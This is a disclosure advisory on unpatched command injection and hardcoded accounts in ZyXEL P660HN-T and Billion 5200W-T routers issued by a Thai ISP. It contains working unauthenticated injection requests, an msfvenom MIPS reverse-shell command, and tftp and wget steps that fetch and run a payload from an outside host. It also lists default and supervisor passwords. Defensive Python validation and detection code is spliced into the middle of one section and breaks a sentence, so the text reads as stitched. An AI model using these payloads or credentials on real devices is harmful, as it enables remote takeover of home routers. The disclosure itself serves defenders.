
SSD Advisory ZyXEL Multiple Vulnerabilities


Vulnerability Summary

The following advisory describes four vulnerabilities, together with default accounts and passwords, in ZyXEL customized routers.

TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.

The routers are manufactured by ZyXEL, and they run a special Linux distribution called “tclinux”. Several models are distributed by TrueOnline; three in particular are widespread:

ZyXEL P660HN-T v1 (distributed up to 2013)
ZyXEL P660HN-T v2
Billion 5200W-T (currently being distributed to new clients)

These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run the BOA web server. The routers are vulnerable to command injection in their web interface, which can be exploited by an unauthenticated as well as an authenticated attacker. Furthermore, the routers include several hardcoded accounts besides the usual administrator account.

The four vulnerabilities found in ZyXEL routers:

Unauthenticated remote command execution vulnerability P660HN-T v1 router
Unauthenticated remote command execution vulnerability Billion 5200W-T
Authenticated remote command execution vulnerability Billion 5200W-T
Unauthenticated remote command execution vulnerability P660HN-T v2

Default accounts and passwords:

Default accounts P660HN-T v1 router
Default accounts P660HN-T v2
Default accounts Billion 5200W-T router

Credit

An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Unauthenticated remote command execution vulnerability P660HN-T v1 router

The P660HN-T v1 router has a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log, in the “Remote host” field:

Remote host: ;command;#

The vulnerability can be found in the ViewLog.asp page, which is accessible without authentication.

POST /cgi-bin/ViewLog.asp HTTP/1.1

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save

The command injection is in the remote_host parameter:

remote_host=%3bping+-c+3+10.0.99.102%3b%23

Proof of Concept

To perform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

The /tmp directory is then served through the tftp service.

This should be followed by downloading and executing a shell by injecting the following command:

cd /tmp; tftp -g -r shell.bin 10.13.37.1; chmod +x /tmp/shell.bin; /tmp/shell.bin

Default accounts P660HN-T v1 router

username: admin; password: password
username: true; password: true

Unauthenticated remote command execution vulnerability Billion 5200W-T

There’s an unauthenticated command injection in the adv_remotelog.asp file:

POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514

The injection is in the syslogServerAddr parameter, which can be exploited by entering a valid IP address followed by “;<COMMAND>;”.

Proof of Concept

The same as for the previously described unauthenticated remote command execution vulnerability in the P660HN-T v1; the only difference is the target device.

Authenticated command execution vulnerability Billion 5200W-T

The Billion 5200W-T has an authenticated command injection in its tools_time.asp interface, via the uiViewSNTPServer parameter:

POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 127.0.0.1:10080
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75
Content-Length: ...

SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+127.0.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA

This request writes the supplied text, i.e. the command you want executed, into a file named /etc/ntp.sh as:

/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 127.0.0.1 " &

which is then executed.

Default accounts Billion 5200W-T router

username: admin; password: password
username: true; password: true
username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678

Unauthenticated command execution vulnerability P660HN-T v2

The remote command execution vulnerability combines an authenticated command injection with a hardcoded supervisor password. The command injection vulnerability is in the logSet.asp file, and the hardcoded supervisor account is username: supervisor; password: zyad1234.

POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
Content-Length: ...

logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514

This will be written to the /etc/syslog.conf file as:

ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`"

This line is then evaluated by the syslog background process, which executes the embedded command.

The injection parameter is ServerIP:
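The root cause shared by the /etc/ntp.sh and /etc/syslog.conf cases above is that a web-form field meant to hold an address is interpolated verbatim into a line that a shell later evaluates. The following Python is an added example (not code from the advisory or from ZyXEL/Billion firmware) of the fix: validate the field as a literal IP address or plain hostname before it is written anywhere, and hand the value to ntpclient as a single argv element instead of a shell line. The function names, the hostname grammar and the vulnerable/hardened pairing are assumptions made for illustration; the ntpclient path and options are the ones quoted on the page.

```python
import ipaddress
import re
import shlex

# RFC 1123-style hostname: dot-separated labels of letters, digits and inner hyphens.
# Everything a shell cares about (backticks, ';', '&', quotes, '$') is excluded by construction.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def is_valid_server_address(value: str) -> bool:
    """Accept only a literal IPv4/IPv6 address or a plain hostname; reject anything else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(value) is not None


def render_syslog_conf_vulnerable(server_ip: str) -> str:
    """Unsafe pattern mirroring the advisory (hypothetical reconstruction): the field is
    placed verbatim inside a double-quoted shell string, so backticks in it run as commands."""
    return f'ServerIP="{server_ip}"\n'


def render_syslog_conf_hardened(server_ip: str) -> str:
    """Validate before writing; quoting alone is not enough when the consumer is a shell."""
    if not is_valid_server_address(server_ip):
        raise ValueError(f"rejected server address: {server_ip!r}")
    # After validation no metacharacters remain; shlex.quote is defence in depth only.
    return f"ServerIP={shlex.quote(server_ip)}\n"


def build_ntpclient_argv(host: str) -> list:
    """Hardened replacement for writing a shell line into /etc/ntp.sh: build an argv list
    for exec*/subprocess without a shell, so the host can only ever be one argument."""
    if not is_valid_server_address(host):
        raise ValueError(f"rejected NTP host: {host!r}")
    return ["/userfs/bin/ntpclient", "-s", "-c", "3", "-l", "-h", host]


if __name__ == "__main__":
    # The last two candidates are the field values quoted in the advisory.
    for candidate in ["192.168.1.1", "pool.example.net",
                      "192.168.1.1`ping -c 3 1.1.1.1`", '"; ping -c 20 127.0.0.1 &#']:
        print(repr(candidate), "->", is_valid_server_address(candidate))
```

The vulnerable renderer is kept only to show why quoting is not a fix: the backtick payload from the page survives the double quotes intact, whereas the hardened path refuses the value before any file is written.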

ServerIP=1.1.1.1`<command />`

The command that can actually be injected is limited to 28 characters.
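Until a patch exists, the practical option for an operator is to detect exploitation attempts against the four endpoints described in this advisory. The following Python is an added example (not part of the advisory) of that check: it URL-decodes a form-encoded POST body and flags the address parameters named above when they carry shell metacharacters. It assumes request bodies are available from a proxy or network sensor in front of the router (BOA itself is not assumed to log them); the endpoint-to-parameter map is taken from the requests quoted on the page, and the sample bodies are constructed from those same requests plus one benign configuration change.

```python
import re
from urllib.parse import parse_qsl

# Endpoint -> parameter(s) the advisory identifies as injection points.
WATCHED_PARAMS = {
    "/cgi-bin/ViewLog.asp": {"remote_host"},
    "/cgi-bin/adv_remotelog.asp": {"syslogServerAddr"},
    "/cgi-bin/tools_time.asp": {"uiViewSNTPServer"},
    "/cgi-bin/pages/maintenance/logSetting/logSet.asp": {"serverIP"},
}

# None of these characters belong in a field that should hold an IP address or hostname.
SHELL_META_RE = re.compile(r"[;`$|&<>(){}\"'\\\n]")


def scan_request(path: str, body: str) -> list:
    """Decode a form-encoded POST body and report watched parameters that contain shell
    metacharacters. Returns (path, parameter, decoded value) tuples; empty means clean."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in WATCHED_PARAMS.get(path, set()) and SHELL_META_RE.search(value):
            findings.append((path, name, value))
    return findings


# Constructed samples; the malicious bodies reproduce the requests quoted in the advisory
# (the tools_time body is trimmed to the relevant fields).
SAMPLE_REQUESTS = [
    ("/cgi-bin/ViewLog.asp",
     "remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0"
     "&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save"),
    ("/cgi-bin/adv_remotelog.asp",
     "RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514"),
    ("/cgi-bin/tools_time.asp",
     "SaveTime=1&uiViewSNTPServer=\"%3b+ping+-c+20+127.0.0.1+%26%23&ntp2ServerFlag=N%2FA"),
    ("/cgi-bin/pages/maintenance/logSetting/logSet.asp",
     "logSetting_H=1&active=1&logMode=LocalAndRemote"
     "&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514"),
    # Benign configuration change: a plain address in the same field (constructed).
    ("/cgi-bin/adv_remotelog.asp",
     "RemotelogEnable=1&syslogServerAddr=192.168.1.50&serverPort=514"),
]


def scan_samples() -> list:
    """Run the detector over every constructed sample and collect the findings."""
    results = []
    for path, body in SAMPLE_REQUESTS:
        results.extend(scan_request(path, body))
    return results


if __name__ == "__main__":
    for path, param, value in scan_samples():
        print(f"ALERT {path} {param}={value!r}")
```

The check is deliberately keyed on the parameter rather than on a payload signature: the advisory shows three different injection shapes (;cmd;#, ;cmd; and backticks), and a per-field "no shell metacharacters" rule catches all of them without needing a list of commands.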

Proof of Concept

To perform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.bin lhost=192.168.1.35 lport=4444

The /tmp directory is then served through the tftp service.

Authenticate to the interface with supervisor:zyad1234.

Write the following file to /tmp/a by doing several injections (the injection accepts only 10 and 13 characters at a time):

#!/bin/sh
wget -q -O /tmp/b http://10.13.37.1/b
chmod +x /tmp/b
/tmp/b

Then inject the following commands:

chmod +x /tmp/a
/tmp/a

Default accounts P660HN-T v2 router

username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234

Vendor Response

We notified ZyXEL of the vulnerabilities back in July 2016; repeated attempts to re-establish contact and get an answer on the status of patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.
